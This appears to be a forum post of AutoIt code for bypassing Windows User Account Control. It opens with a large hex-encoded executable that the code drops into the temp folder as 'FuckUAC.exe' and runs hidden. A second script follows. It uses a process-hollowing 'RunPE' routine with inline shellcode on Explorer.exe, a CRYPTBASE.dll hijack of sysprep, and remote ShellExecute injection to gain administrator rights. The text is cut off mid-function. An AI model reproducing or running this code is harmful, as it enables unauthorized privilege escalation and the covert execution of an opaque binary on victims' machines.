        $FuckUAC32 &= 'B80CC92B796901610147879DD48629EB2CD2750316EC7D2A8D0ED8D6F9D78EF1203B8B95ECB712B308296CF6B5E0DA0ED4CED1B780CCA806C956566855F83573C97C90F0EB06562BC1562B550ACB1CD113413254B41DFF99BBD964E9D83BDE4597FBC6C650B70608EF8D84353C00D003B58215747B28387FCB5A26C47633DA115C8BE80835D10893B70E0B1B3FDB6B80CF8B39511DB52156389D87C324155314443E4B0B9B3B5F4D38756C5AB4469656442D7BE7C04C1291825909F693D4CE4F306F9E1B4C59EB31CB091B1C18CCF50F9832D853F180381A5B243F1C6C4F381831220CD0388D01D18C305B855EC8138341B8107068850C1EA900FE751B6DAA46CFE08EC769CBF846ACEC594F1D1A262E49E1A070D27EEDD76E4185E88BF314CC8B07895B65A95B3076C6539FA2B92DB27C6E16F61513E58ADFA46419620B52C51B095B43170FCF92C44BC214C969D4F319ACD1E7BC3C7D6CD388809CB20313CB6AA432854CD912C3DA068E354332CE0631130559A103E2290481530BFA11B7A037CCABE400659F04F1681929E489087662801CB2D86AAD36A15331164A5B5718D82FD00C0659A882751949BA3B55035183E56C26A8365183191C1C2255E1A816A806DAA8170DA8B98DBD056EBFA94E08D0FE8991464CDF4A87E81951CB15EF5B0BC309108741092CF35C0244293EEF0DA8D0B030'
        $FuckUAC32 &= 'B66B12096800332E980F4114A1A257CF89B7B6D46E3EC202646C182BF8C097800651A9201D571B3A01B3503B1B70EB4E01858741856ADF2001A609A08F0BF93E0036B5651F0BFA05E295BED8C540FD1553FC51D7412E7E9523C2FE712D77EF8B5D853D6EEB1D50FC6E0A5829DE8BFB12417738098D16CCFC8F36EB07101ED15BFB2508DE73784648AE17576D8A0D25E84871E33774164A1E1A10C87387C139F3C26883C80221986E412E992880012603C886496D3BFB4D108910BE22796D6F86844BAD53536C258A4D088899880DE808EB164D570C188487856E640927EB6AC9822BA36300FD6440BC55F2103BF37511AEA589BAB4760DB2C318DF57F452B37B0C3B08FF818B1BB012627F76E04B1858222100A4909004716E06397114B9416D73BBE476365E740F0B5772C0128060473A564D00622F41C2ECD2BD22E03526772075490330E42269852CC1EC8F01D68806A92501012B8300A93C23B656C4B7B1A30C5153570208140D02B050F60C87D0ED515BDB3814390FB66A12486C0BB3FECB74BD8901EBB94B6B7A195066FE6DCD8C547307FB0F866BCA9800EC02606E3D72C0F6C28A266D8D1F142F88042D67021A661B388D54BD5541386F28CDA8A67A29C15D533E0047566F320A48FCD4ED27AB6F108B5028520324521B59556EE06F716E617CAA0D80925550586F30518984003BAC0D'
        $FuckUAC32 &= 'C0A95ABE4B3B28FDC6012835563A837C242C7D01B8BC06063B74762D358B0CB389056003B08F0C367CB337B008C0911744B338080026D5FB40EBB7B61DBCC76E4C3843648B0F817904837BFFD252A45180520C3951087505DAA60DF685A051A9BD80EB0B088B7FAB97FE6B4B088943996B0C551958595D595BC2E087D1A80429B51C8B5510D30BB43926D758408955E4A4C1F50A094275F70DBA1910D9607C793538784EC8C9180975F657767018387E8A07878A4C57D601253217143CEBE202F5E96881FA1A774E233BD3AEA31601FD2B95FDF2E0BFC41D5674358A702402C0D0F88845FE296883DFCEC0486A045992488A6D6BFD7AC2F7D0A683E298D18B29B2C5166A403E7A156919D826A3161A3620D16DA3DA202B10DD03FEA501C0413350314B8805723E1A1EA401972C0F0C3908F5ABED8C0848707A740F16A8DD45700E288B540E2C0C042FDDD831F675488B0E7A8A49953A04BC110A7472B8700C82B7BF6E807DFE00880B228D4301F0BBD0B6EDC639052150121C0E252C665B6BE4453F901240313C233FF92A02250A7525261A3DE9868C142603260A52DBA11D524DE8EC5907417E339FCF06810878031A85C90F886DFF366588571687641307014DF4A672B58B8D0FF600D214106E297079BD14791DFCADBDD00A803B7ACC0804EB0380208AF0FAAD15BA8B6CC32BF2073BD80F83'
        $FuckUAC32 &= 'D1A26EFB76014B8A013C1A33AF0C3C0DCDD52D828803DD14317355E8D6BB4A2F483BC873E34101F7C3778D70EAAB1AC6030AEB757FF601BB76EB6DFF04B345E849FFB51ADCAC17750A43091DE8616B6761BA48FBA4FF07C60BB46DB9460D11C5FF884C36B961ECF6EB253B9D750618A0A7FF6AFFAE19330CA12F0443909DB5E7A9391E46153EFB40A65C6BF0E40234C8BC8ED47087028980E488770407179F412F4B8A0B548282FB84C9780643DA85D3DD8DBA4067EB0FC87F137C72EDADE9DB0E4B0F0B4080B988901FE88A130E2151A2F3CA0FBE892A64F85285CF2A7A41140403D8EB4089FACD56C3D231254388543105A8AAB6B5767C0938140C0E11EDDB8739F30D26432B2D12F7D899DBD11A0AD85250D9782B7B8006F5A0D4BE441ADC6555506BD8C03C34854C252B4995B906D4AA81ECD9F023DEB606D05A08E6EA8B6217A3BD9A32EA078B17CBDDA81655C3CC03C048C632EE586A16DFC6130B6683140118622DE163C62BE8308316D93D179868A1C511C6FEC3E8B0A9E233F9638B96C1FE96CDD0064F1E6D55390D7DC6B7D91D046A0A1F8444758283842C83B111022502F8ED9091255B552852636BC1C27DF8F6B2097A0329A5D27CE7F808F9253318671F9706EB2A39072C853A37390BC8FE4409BFB1E9390C401A19D3740EB600CAB340060EB500F6E132CC2694D2284F9F6C40'
        $FuckUAC32 &= '156038E91759F8520234234B7F6DC54C656A5A4EEB3590B39A55AFF1A86A01C80B76DFD86EC00B0D451BC0D715011AACA4CDAD137A047222704376E82254A4B03A9698441D005DB5A3A7A8B75D894108CD4941ADEE4370C74144EB110C045F42EDD5B9141A1202910904F589368A9C01635699777F855C32750AA659F654BE9002021A161A8DE868974024E05571E7CCF10845B2E8CC1149D10B8912FD810C80272C7AFDFF042BC8D15DFC17E2D023C88BC42500F0F5C8720A68FBBEBDA659948B940424C32DB785B9E9961A982C7F53450B5B4D8ABF5426993CB741B35AB6205BC56FB8879EE48A0774277923FD7F092ABA3AE772063AE3770202E63AC7003070D309C3C63AE058A38D565A83D1AF0AAAB96DB06AA3FD7202F7D971415FF8C0674710DF7C0550A1A85BAD17E4E461F680A52EE03A2B0143F9751C320AEE90894456712A2438D4DD891D33593BC758AA253D0C31802C7B452C7EB1281D7B7F02743C6356BB5959C61F00A7667504F8578252C84970A80203D0C83122E404798C84011F8FB6783D59B40FE782C3087979955F452D05BFAB741EE81A41972A8287DAF7FB765514CA45C13246043EA206A373514FA0B88AF7DBEF054670A10C7435618A5190F8CAFC040D2003E4A3398A8E8AA2C9E27035898655ECF2AB828156326FDDB62B838B9ED9B7AE91D4B76859C7AF8BD7EB'
        $FuckUAC32 &= '4ACE9D6DCF5D5406F85114392830680C8113413B2401C39570EBCFC68D28EF9E656177FD8B6C55FCBBC914E8A9A00145132700E1ACE2E0D91C9D59C5866D8BB6D3C57B6FE60F888B84C5D125CB20230BC58DF00F4CAB2B699631E1501C3E6E2D0221C0E39755E0CC025805AA8AB294ADC125DF7B932C8BAE24CC26E243E17DF0FD58007BCB7C5B3B0DBD7321A387064E25F1F0050DE2678C36833C304785AD3F08521D2BCB74104988496E1B6179FB536AF4EB0804F5EB03F68818373268E178830C06269220014520981852096429207D24189109105C9D5BD59D206640478867D442D3B308CDF108D6A36BA02210C712C7E4225901E6F728D502C00440835EF89600B08C35390F19A5F6480AA375031A482AF5121AFF6A7D04DDC4A85881E95B5D69B08D606C663837886C0900AE256686486C29091A0F3B01075802838C94DA96012E15AA0BC81DEED1968ABB0F04F7E1335305B3A56252B6820309AE7B28F7E103D35B1A65030268E4D3119A82402BACA71CA3A617D11AD2C3AC361EE7368240070F302506DB13556485EF0010BA5C2EB7E3031B7959585E012D850AA4CB4B8E7D931C2A9EB979FBF2BED0BF284800013A006D3A00730D6290A600642CBD069B6CB04D012011790100D3CD46C6172F2F1113509BFB413E07414400650063035F620DC98F750572134E006F00764FCC7593DC'
        $FuckUAC32 &= '2574006F5307701125FB5CF7B753750067037317004A0B77E626B96C00796E277B702FBE9AFB5C691BA3610B5BEE46CC64AFEB1F620D7513376161C366CB11AFA397366CD8B08F837B7786253B1B67797B77EBBE61C3736747614F751B97BD17AC643123AD0F54EB06EC73AD217313574764E19BB06ED91527750F4DB30B59B7AC6E336B750F7B1B366CD86F675B4FFFCD860D473F0748483A6D6D5F7337C63A731C64002C204D2008791EDCB27500000B2F2F08FF4D7B84BFD90341446563656D6265DC4E6F760B3FECDF274F63746F0A5365707414417567758FD0BDBB73984A756C43076EC8417072DA47788469C3617263BF656272750BF7DE7BCF23616E0A675F5753EF75EFBD4B47433779433F3DF7DB7B3B33236174757264184F3DD876AC5E095468127313576564639F1DAC7C0C5475094D6F6E1053F7DE73B37507433B372F27D1B5FFBD231F004B0045005291054C8EB98E2F6B0032002E514C016F6C7319FBEDDD36656507AA7456616C750B47FF43FA01416C6C6F63A10102030405060708FFFFFFFF090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728FFFFFFFF292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748FF46F4FF494A4B4C4D4E4F50515253545158595A5B5C5D5E42E1FFFF5F60616263646566676869'
        $FuckUAC32 &= '6A6B6C6D6E6F7071051C61FBFFFF767778797A7B7C7D7E7F00436F724578697450729265FD741D9BE36D6B9C6F3D65012E1D232375336C037274536D626323751720AD722720C76B1A8C8D520AD74C4F5301C3361B98231D1349353A9E02584719934F9341F98504F6211F6F360030003335CB759F112D23418D3BDD7B8DF543205920399F4B53B1B1CF344CCD6413665311E8BAB16D2B68C973096111DD03AF5981670375ED69453ED735670D6E21F57635DDFB964B1F69191F6C7A2F59779A27559F545F27B9C146BA641F636573206D8B3D307B631F6F6F751BDD807CEE700151632E194917EBCE62E5556D15730F29B1EFCDDC6B57BBD79D7269FB9EFB5EBD236FF9BBA96CD99C4B7825AB272DA07B1D384B532B1B288F08DD66F3156C4D293D01080742B263934F61298CF778136EA339352B406CC2DE0539449349A684EF49972EEF327587F7B96E31CD65093DEB20DD6C42D761703B63DF5D4F6FC2591266EDA9196D51A164CA58573137205C09EF656F434713920D4254977219612508E37B6D9F2E17C2B2C991C73093371EB2216CC1643F320038C2480F49ED611565050D7B8750039F4B3744C2814F37BF77E11C60A1A4676F3622FB0890A5646F7D1126193570A95776B4924ED72F724375392443F6968B3BBF346FAC7B035F551178B92FB16C0887640DB9C5BF4D246CACF539EF'
        $FuckUAC32 &= '6F087649CF6D7FCF6F1FC810F61D05E7635738781CDE4B8D490375C25602CB33EB4717ACA1E4376DE5EBB2C9FADC68435564036B5FC20664A42F69CBDEE1D07B634757BCBD4392305337F928002971E2F4E073E961B6ADA4840D8F01399F87192F402183B36FD98913AFB99F57A947019238ED9BB69471D85173BF57320C0E874966831B717AF09E9B700F0B6D9D9C2D9BF0D119853364E4B12F210B0002078DE8084F1E79F29009380A8CF0109811F2E4912738128BF0139818234F1E7928198AD81A681B893CF2E4C9F81CA81E681F88A020C993479E382186487828799E3C79E40C7A85F0FCE8FFC84DC69E0E911B813366DB567E605604FB159F2B002BA61B126A52594C3962DE595B56BFE3E52E01C4D867E8073C375967256D8DF0CD827B3D4B6B4D77499AB2D7053E36614511119AB0B1215B504D3AD19AEE3555030B3C0B1D04A4199041968D08199001198E8F9001199001919220971C9093B402B532E24937034F09000C9F5C88BBAA200128C903209320480010840C201384100C810CC8810110810CC880820208300E0B3B2001B2A34826680101268C11D8000101612190CB01023B1B95ADB2DFFF014DC865E6141B140160234B84002FEF6D64CB46F71100FFFFFF9B00808182838485868788898A8B8C8D8E8F90919293949596979899FFFFFFFF9A9B9C9D9E9FA0A1A2A3A4A5'
        $FuckUAC32 &= 'A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9FFFFFFFFBABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9FFFFFFFFDADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9605416FCFAFBFCFDFEFFC00016A4B0A0C08530AA6CFF7F16CA8854401F260084157F2863F0D481D93D2913282D995EF76E756C6C0A0602213703B9F86CBF07060210044500053530EFF95B35FE2820385058B660303057500700BD99776D200B0008606860087870789C6BA5DB0008071507001A019F14A5F80E00CC2F57696EFEFFDFFF646F7753746174696F6E17557365724F626A656374496E666F726D6F1BCFC61857334C61B9411869766567B3D88D50C67570130F46005BF1F6BB4D51616765426F78315500535F52EB367E24068080867380D803070CB5AE7D86828014D1D98500B0B6656BDFC980508088A5DB27572307AEB5AEFDDC505011DD281839086BB7AD75DE6800CE07DF707702D7A05B8A0943834E035511C055B537556DA0E7CE826CD3728711BAEABA77B69B014F033AC1466F183069693B33E7A4788A7449653D6D9CE011B17527B9798E784443170901C79B056F56193BFD49D512E2D1BF6D6F0674B569346162DF5B5990C044475B057DAE48D96127956B0059F18A480BD7DF5FC204774EF3656D52746C8523FCC25175CF7945'
        $FuckUAC32 &= '6C6576C8466C9ED4752B6B68FF0574455182B1A74E5BB545E37609B1B9CB3B46110D67FBF04E8AD973A7B56129C4D992E03F7FC55724ABA76627CD734119700A076DBFE9DB12F6BD65770A9719258FC104789F9D432B610E30AB25D345E30CC09E81033D3F3BBC4A06F94DD3F124B812DE3D17441BB35023DBB94D6DA97429924DD92E57501B836173639B0D4953550B27205149F0782B3F0FE531BEC78453BF595443B286C3806E794F7F464FEC027B0937514E4F6FA46E8055354B63573FE94248092F11773D91AD84C3DB6B77CF70093145C92F837BA0E9B6610F3B28912932BDD73DBEA731BD37686925CC8D30D60F424D72B73C071D3368C80E400F2E3717BC91BA3E59414B20B5452318E482218B9FD7BDD3D3A964831B0170F30C61235D2F01772E590AD6204D2527662520B16B5987147F417B306B122D1B61491A9296DD19651DB6B246608761818237C246A967BCD761668F79CB99755990620857D90096E0A0E44800B0CAA0FFFF5F0D49EB534453BE96201BA0B1C246B922E813133D83FF5DD047D484443A5C56697375616C20E51C5CE87275642032C1305CFE5B83FF0FE3735C55414320427970D90A523E605B8165260765122E706462603BF7C871C03A0315307F913B9F29586007D40F9003D92D1F075ECCE445D69D08CF03E33F0CD8BDC87E2B0010AA3F142EC04EC9811F'
        $FuckUAC32 &= 'D815590B0DD82B6C6827171B0B2792037985AF2D38C04078919C30013FBF0F5E24A7E4D04C334DBDEE05F612954D89CF54AB0364DD2B84BE17561E0322C791BD485E580B59BFE745F62279620469D51F45C28BE46AAE76E94717D98BE479967B79BF7DA764908F0377E49003DA2A215E2404A50C115408AB02BE83CA4C012EB119BF4400A690A9C20010000630424620500AA916402C9042A859FFCCCA48010940030A09C6A80AC86FFFA9B01001020408A403D660827982219F9F3C3BA6DF07A1A5819FE0FC407E11D2BB9180A82FC1A3DAA3D0021BE4EC81FE0740B52FFEEF061941B65FCFA2E4A21A00E5A2E8A25BDD7DBE427EA1FE510503DA5EDA6E7F25BF5F5FDA6ADA32D3D8DEE0F939317EBA4F434CD74384D003CC699AA669C8C4C0BCB8AE699AA6B0A8A094882F9AA6699A8074706C6864699AA669605C585450A6699AA64C48443C3069BA419A282018031008D3344D7383FCF4E8DCD8B2DD344DD4C8B4A80904D1019AA6E94E83A00398908880699AA6697870605040D35C9AA62C180882F4EC4DD3344DE4DCD4CCC4BC744DD334B4ACA49C2F9483344DD3847064584C2E4DD3740340301C0C81F8699AA669E4DCD4C0981E11F69C3FB700B53427B083C00F01ABBCE89ACBED2591583B95E0976038EEB0603BA9A0FF003F1603A6196C9002030704189AA6699A050D0609070CB0'
        $FuckUAC32 &= '41066908090A1B7DEF05640B573B070F20DD608357101311031264B041BE1721350F41B0C106194350335217C1061B6C5307575F597B699A6EB06C176DAB20701CC1BE17A472C72F80B306196CB08107821F838406699AC18F91299EA11B64B041A46FA7B79F1C84C106CE1FD70B1807CF2C2DE13373930764C078C8CD8001013110228432AE028FBBB488002BE9C12ECAF8FF800A34011776662192011F2F90226F511F034E1A18082E8B2EE00B7694DC03CBF47F002F0EACB0A6E4F803DBEE24DF07D3935AF72E98700308062097606F031D04592E2032012043329400020394012C81436F108A00815202244591B810C9008024824751440084F67F836801EC4D6F64756C6548616E64053689E8DB57114F70656E470CA2F707F9526561644D656D6F727931FF62DB2732457216720D1F416464725D0BE8633056697274961374B5076BDB65632478113E3332461A64CB66AE36606F0F20FB6FDBF74E65780F4349613C546F6F6C68656C7016872D6B7F536E617073684F39286C65ED2DD86F73B70C57726934AA7AFBEE7E436F6D6D214C696EDB4859705365B55BC022041354650A423B4BB61D613C3675DE06AD8D3DD97412556E686764D1107386B6BD7038BD6C32004E1C0CDBFF0A49734465627567670B501EE6BA77E6505C50801D6E24C3B0B36DED636B390A63206D1558EB923C44'
        $FuckUAC32 &= '65364137076E55B5F74F454D095BBA6964BFD670DBE064B961670145430B6F696F56957B40D7D209922F5955E80C530040C85C6032415808EF25D4E30F43F736C354689BAC646C3143736E276C6D69634A2E634B4C1D7665025655CA15C9C2630D13A71F6557537464C00E7FC918891C4E616DAF3BB4C6F68D69762846062D1258EC5B3C6E6773572C17376161E6B84F16754C8B763BB206267A9541245370340EFB7BB3264E755479709661B61D1E3AC670A657251A74D6D4663C564CAB0B428CF6459050035787B3ED84B37E653B54356B67C2775819594A6F796CBC776B85E828CC4173880996DA56302ADD4868890A4D59FBBB1516734279694C434D76F01BD692B99A18232DC02118EF0520CFF5D7F246A3055AA0B352746C6E9B76E577694E6F611C62723779579BDB823D5397C646D8AA652F182F19B7444F0A6827CD5A180C636E30E80C036B72500DCB7046ABF0AFD466BAD1427566660F513004E905108C99DE8460C11337C4210909633296532772FF7FACBD202A000E12310B0F2B2B1A0C330A092627FFFFFFFF050F1E060B0709350F062571213B27350B1E1F06080623160512141F1C242837CFFFFFFF08150BF03F0187BD250D0D0C0C0612080B47050A3A050706750607DBB72F27080C0905064F0B0C05100706FFFFFFFF1607683D17F07001113A0D0A0E090A340B0A190A'
        $FuckUAC32 &= '1324373513701D496F1F750CFF7FFBED13121B3117191C0906350F272911144C4F4854C32E781A11739B6BED3930076501180408083FDBBFF95B5522152640062A18267A230A38084909056E5BDB6D1B07010807082805710406DF7EDBD6034916100501070F0D09200618DFB6FFFFC212E00A0D3E070D063D1C23132D061A0FC2101B0C0D241285FFFFFF0E150A26330F09242F4212F02401E90F1BF01D03F04301F04A91FF7FF6F62C22F0D508750204000F1D54DA08181B571465072207BFF0ADB59F8F58077508130B1F0A051C0A167BFBADFD0B1A0B081006B64E071A072BA2D847180ADB17B6FF7F060E340D15311D4C2EF06D013D0F43FE11447D01FFDBF6BB0CA46A07153C2626CD4507470A2B181E2430122E4243DBFE230614052105289B239F4829635EF8B6FD26834999D0EB992D0A12170E8D071914DB16BED0774040542019822AF137020764F76539F09E0312002612392CC1BE2DFC18F02B0132189205BB29261E07C625E4EEDD4A0604660B1B0716212A322FFCFFDF302109270D050EDB230B234F62234021224949B16F100BA4FBDBF6ED6EF032B6F00B01CCEE1E82F01A01175937C58DC242610E71E62F6C0A142EEC1C09010E61AF880F5DB5D67E6B42767005090F231E274BDBC350B84005110AC018160A6EB717FE0B3B1A1AF00202B6D905193D0FB4166E06FFFFFF'
        $FuckUAC32 &= 'D6CAAFA401815FA320F0F0002959F06E01DAD03116411F9D322863E9EEFF7A2A20360AF0560107F0670363011E680C21FFDBFF7F095F31F08501B60AB40F770DD50AA03E27A0554706BB3D0A18297FE3FF770A0D1F520D191E3C28961318205328602D2D0B2E0E51D8FE6E0D7711418403F10C042CF0CC9BFF00666700F0A81004A81C04200C1C9EEC1D6B010718041000F0D810584B81DDA701040050003EB4E6146010249F918001582093ED8DE003510C04D52F00AC4C01518314BC7296DD4E13E0A2D9164A63B10A0C7E4AD79C1C09AB0D1990400BA7828F8244058D2D97E665070010040B33038298BDB727812802076CCF764AF264B30828F002B4721B6015D014840753D80BE26091D70060ACF496BDAF9500A7972FD8CEC52B2E74D207B07D90A0B9B02FEB0456202E726B5020409BFBEA29ED16D20D2A278277402E6583759F26008C2D04C053AC270D56E036C04F7372C4EBF0050248D34F02BC746CE703011DE40C270EDE7E53D2BE421BB0B412CC04010014807898920000000000000012FF00000000000000000000000000000060BE00D040008DBE0040FFFF57EB0B908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EE'
        $FuckUAC32 &= 'FC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B97F0300008A07472CE83C0177F7803F0575F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE000001008B0709C0743C8B5F048D8430B821010001F35083C708FF96E0210100958A074708C074DC89F95748F2AE55FF96E421010009C07407890383C304EBE1FF96F421010083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEE82101008DBE00F0FFFFBB0010000050546A045357FFD58D87F701000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9F4EDFEFF00000048000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004C0400010B04000030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
        $FuckUAC32 &= '000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010001000000300000800000000000000000040000000000010009040000480000005C3001005A010000E40400000000000058F000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F'
        $FuckUAC32 &= '3E0D0A3C2F617373656D626C793E5041000000000000000000000000FC310100E03101000000000000000000000000000000000000000000083201001632010026320100363201004432010052320100000000004B45524E454C33322E444C4C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000004578697450726F63657373000000000000200100100000006239583B5C3B00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
        $FuckUAC32 &= '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
   
        If @OSVersion = "WIN_81" Or @OSVersion = "WIN_8" Or @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
            If @OSArch = "X86" Then
                $File = FileOpen(@TempDir & '\FuckUAC.exe',18)
                FileWrite($File, Binary($FuckUAC32))
                FileClose($File)
                Run(@TempDir & "\FuckUAC.exe", "", @SW_HIDE)
            Else
                $File = FileOpen(@TempDir & '\FuckUAC.exe',18)
                FileWrite($File, Binary($FuckUAC64))
                FileClose($File)
                Run(@TempDir & "\FuckUAC.exe", "", @SW_HIDE)
            EndIf
        EndIf
    EndFunc
Код:
#include <WinApi.au3>
#include <Memory.au3>


;Code By Pink|Danyfirex|Dany 28/03/2014
;UAC ByPass
;32-bit Only


Global $_LZF_CodeBuffer, $_LZF_CodeBufferMemory, $_LZF_Compress, $_LZF_Decompress


Local $sProcessName = "Explorer.exe"
Local $sysprepPath = @SystemDir & "\sysprep\sysprep.exe"
Local $sCrypbase = @SystemDir & "\sysprep\CRYPTBASE.dll"
Local $ExplorerPath = @WindowsDir & "\" & $sProcessName
Local $TempCRYPTBASE = @TempDir & "\CRYPTBASE.dll"


If Not (@Compiled) Then Exit

If @OSArch = "X86" Then

    If IsAdmin() Then
        If FileExists($sCrypbase) Then FileDelete($sCrypbase)
        MsgBox(0, "Pink", "Hola Soy Admin :)")
        Exit
    Else
        MsgBox(0, "Pink", "No soy Admin :(")
        If FileExists($sCrypbase) Then FileDelete($sCrypbase)
        UACbyPass()
        If FileExists($TempCRYPTBASE) Then FileDelete($TempCRYPTBASE)
    EndIf

    Exit

EndIf



Func UACbyPass()
    WriteDllTemp()
    FileData()
    RunPE($ExplorerPath, FileData())

    Sleep(2000)

    Local $hProcess = _WinAPI_OpenProcess(BitOR($PROCESS_CREATE_THREAD, $PROCESS_VM_OPERATION, $PROCESS_VM_WRITE), False, ProcessExists($sProcessName))

    Local $iRet = RemoteShellExecuteEx($hProcess, $sysprepPath, @ScriptFullPath)

    Return $iRet
EndFunc   ;==>UACbyPass

Func RunPE($path, $filebin)


    Local $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
    $ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
    $ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
    $ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
    $ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
    $ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
    $ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
    $ASM &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"



    Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
    Local $binBuffer = DllStructCreate("byte[" & BinaryLen($filebin) & "]")


    DllStructSetData($BufferASM, 1, $ASM)
    DllStructSetData($binBuffer, 1, $filebin)




    Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
            "ptr", DllStructGetPtr($BufferASM), _
            "wstr", ($Path), _
            "ptr", DllStructGetPtr($binBuffer), _
            "int", 0, _
            "int", 0)

EndFunc   ;==>RunPE





Func RemoteShellExecuteEx($hProcess, $sFile, $sParameters, $sVerb = "OPEN", $hWnd = 0)


    Local Const $SEE_MASK_INVOKEIDLIST = 0xC
    Local Const $SEE_MASK_NOCLOSEPROCESS = 0x40
    Local Const $SEE_MASK_FLAG_NO_UI = 0x400

    Local $Databuffer = 0, $FileBuff = 0, $SHELLEXECUTEINFO = 0, $sSHELLEXECUTEINFO = "", $sfiles = "", $written = 0

    $sfiles = "wchar modulename[12];char function[16];wchar sverb[256];wchar file[256];wchar Parameters[256];"
    $sSHELLEXECUTEINFO = "int cbSize;long fMask;hwnd hWnd;ptr lpVerb;ptr lpFile;ptr lpParameters;ptr lpDirectory;" & _
            "int nShow;int hInstApp;ptr lpIDList;ptr lpClass;hwnd hkeyClass;int dwHotKey;hwnd hIcon;" & _
            "hwnd hProcess"

    $Databuffer = DllStructCreate($sfiles & $sSHELLEXECUTEINFO)

    DllStructSetData($Databuffer, "sverb", $sVerb)
